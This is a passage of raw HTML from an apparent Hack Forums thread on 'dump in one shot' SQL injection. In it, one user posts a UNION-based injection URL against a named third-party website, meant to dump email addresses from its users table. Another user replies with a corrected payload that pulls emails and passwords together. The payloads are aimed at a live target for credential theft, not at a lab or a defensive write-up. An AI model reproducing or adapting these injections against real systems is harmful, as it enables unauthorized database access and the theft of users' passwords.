(@x:=concat(@x,0x3c62723e,LPAD(@running_number:=@running_number%2b1, 3,<br>0x30),0x2e20,email))))x)<br>,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,
​33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -<br>but failed ! what's wrong ?<br><br>thank you , ajkaro!!</div><div class="post_meta" id="post_meta_35576842"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1985118" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=35576842" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35577915" id="pid35577915"></a><table class="tborder" style="margin-top: 5px; " id="post_35577915" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-06-2013, 10:44 PM <span id="edited_by_35577915"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=35577915#pid35577915">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1872688"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/khwm.jpg" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1872688"><span class="group2">zZh4x0rZz</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 18<br>Posts: 206<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1872688"><strong class="reputation_positive">16</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35577915"><blockquote><cite><span>(10-06-2013 09:57 PM)</span>eagle360 Wrote: <a href="http://www.hackforums.net/showthread.php?pid=35576842#pid35576842" class="quick_jump">►</a></cite>i
 just removed (information_schema.tables) where 
(table_schema=database()) and added users ,in the end ,i added some 
colunms like email and password<br><a href="http://www.blamm.com/top10.php?id=8" target="_blank">http://www.blamm.com/top10.php?id=8</a>
 and 0 UNION SELECT 1,2,3,(select (@x) from (select (@x:=0x00), 
(@running_number:=0),(select (0) from users and (0x00) in 
(@x:=concat(@x,0x3c62723e,LPAD(@running_number:=@running_number%2b1, 3,<br>0x30),0x2e20,email))))x)<br>,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,
​33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- -<br>but failed ! what's wrong ?<br>thank you , ajkaro!!</blockquote>Use this to extract the data:<br>(select (@x) from (select (@x:=0x00), (select (@x) from <span style="color: #00BFFF;">users</span> where (@x) in (@x:=concat(@x,'&lt;br&gt;',<span style="color: #00BFFF;">email</span>,' : ',<span style="color: #00BFFF;">password</span>))))x)</div><div class="post_meta" id="post_meta_35577915"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1872688" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=35577915" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35595657" id="pid35595657"></a><table class="tborder" style="margin-top: 5px; " id="post_35595657" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-07-2013, 11:39 PM <span id="edited_by_35595657"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;pid=35595657#pid35595657">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1985118"><span class="group2">eagle360</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 17<br>Joined: Sep 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1985118"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35595657">thx<br>zZh4x0rZz<br>i cannot reply to you directly...</div><div class="post_meta" id="post_meta_35595657"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1985118" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a> </div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481&amp;replyto=35595657" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3532481&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3532481" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3532481">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3532481" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3532481&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3532481.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%232%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->